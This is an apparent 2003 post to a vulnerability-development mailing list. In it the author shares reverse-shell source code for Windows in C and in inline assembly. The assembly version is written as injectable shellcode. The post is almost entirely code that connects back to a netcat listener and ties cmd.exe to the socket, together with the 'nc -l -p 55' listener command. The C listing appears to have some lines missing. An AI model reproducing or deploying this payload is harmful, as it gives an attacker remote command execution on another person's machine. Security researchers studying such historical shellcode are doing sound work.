Vulnerability Development mailing list archives

Windows reverse Shell #2

From: NetNinja <netninja () hotmail kg>
Date: Fri, 7 Feb 2003 18:44:53 +0600

Hello folks,

Thnx everyone for ur replies.
Today i found time to have a careful look at my reverse shell C source
code. THe problem that i had was very simple. In my C source i forgot to
initilize STARTUPINFO struct to zero. That was the problem. 3APA3A's
code did initilize that struct, so big thnx to him. Another thing
u have to do is to cast socket handle returned from WSASocket call to
ptr type and pass it on to stdInput,stdOutput and stdErr of
That's it!
If anyone is interested in reverse cmd shell for windows i have
included both C and inline asm version. so have a look at them.

---- C ---------------
reverse cmd shell

Will spit back command shell on ur listening netcat
on ur localhost ( port 55

set up ur netcat eg. nc -l -p 55 -vv

Adik (netninja () hotmail kg)

#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")

void main(int argc, char *argv[])
        WSADATA wsaData;        
        SOCKET hSocket;
        STARTUPINFO si;
        struct sockaddr_in adik_sin;    
        adik_sin.sin_family = AF_INET;
        adik_sin.sin_port = htons(55);
        adik_sin.sin_addr.s_addr = inet_addr("");
        connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESTDHANDLES;
        si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;


------[ end C ]--------------

----[ inline ASM ]------
reverse cmd shell
inline asm version

reverse cmd shell on address port 55

Adik (netninja () hotmail kg)


#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")

#define GP      0x77E7B332
#define LL  0x77E7D961
#define CreateProcessA          [ebp-8]
#define ExitProcess             [ebp-0ch]
#define WSASocketA              [ebp-10h]
#define connect                 [ebp-14h]
#define CMD_STR                 [ebp-18h]
#define PORT                    0x3700          //(htons(55)) here u gotta reverse byte order 0x0037=3700
#define IPADDR                  0x0100007F      // 7F000001//(inet_addr(""))

void main(int argc, char *argv[])
    char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"
        char *i=ptr;

        WSADATA wsaData;                                                
        WSAStartup(MAKEWORD(2,0),&wsaData);             //initialize winsock, this is not done below
                                                                                   // usually when u inject ur 
shellcode into remote process
                                                                                  // socket is already initialized
                mov edi, i
                dec edi

                push ebp
                mov ebp,esp
                sub esp,0x20

                mov ecx,ebp
                sub ecx,4h
                push ecx                        

                inc edi
                cmp byte ptr[edi],0
                je done_loadin

                push edi
                mov eax, LL                     
                call eax                        //LoadLibrary("Lib")

                mov [ebp-4],eax         //places lib handle into ebp-4
                xor eax,eax
                repne scasb
                cmp byte ptr[edi],0
                je load_lib

                push edi
                mov ebx, dword ptr[ebp-4] //lib handle
                push ebx
                mov eax, GP
                call eax                                //GetProcAddress("Function")
                pop ecx
                sub ecx,4               
                mov dword ptr[ecx], eax 
                push ecx
                xor eax,eax
                repne scasb             

                jmp load_func

                xor eax,eax
                inc edi
                mov dword ptr[ebp-18h],edi
                mov ecx,50                                      //make some space for structs
                push eax
                loop push_em
                push 0x1                        
                push 0x2
                call WSASocketA

                mov ebx, eax            //copies sockethandle returned into ebx

                mov dword ptr[ebp-40h],0x2                      //sockaddr_in
                mov word ptr[ebp-3Eh],PORT
                mov dword ptr[ebp-3Ch],IPADDR
                //mov dword ptr[ebp-40h],process_information
                mov dword ptr[ebp-94h],0x44             //sizeof startupinfo
                mov dword ptr[ebp-68h],0x100    //dwFlags
                mov dword ptr[ebp-5Ch],ebx              //stdio
                mov dword ptr[ebp-58h],ebx              //stdout
                mov dword ptr[ebp-54h],ebx              //stderr                

                push 0x10                                               //sizeof sockaddr_in
                lea edx, dword ptr[ebp-40h]
                push edx                                                //ptr to sockaddr_in
                push ebx                                                //socket handle
                call connect

                lea edx,dword ptr[ebp-50h]
                push edx                                        //push proc_info
                lea edx,dword ptr[ebp-94h]
                push edx                                        //push ptr to startupinfo
                xor edx,edx
                push edx
                push edx
                push edx
                inc edx                                         //inheritHandles = true
                push edx
                dec edx
                push edx
                push edx
                mov eax,CMD_STR                         //ptr to "cmd" str
                push eax
                push edx
                call CreateProcessA
                push edx
                call ExitProcess                



----[     end    ]------

Best regards,
 Adik        (NetNinja)                          mailto:netninja () hotmail kg

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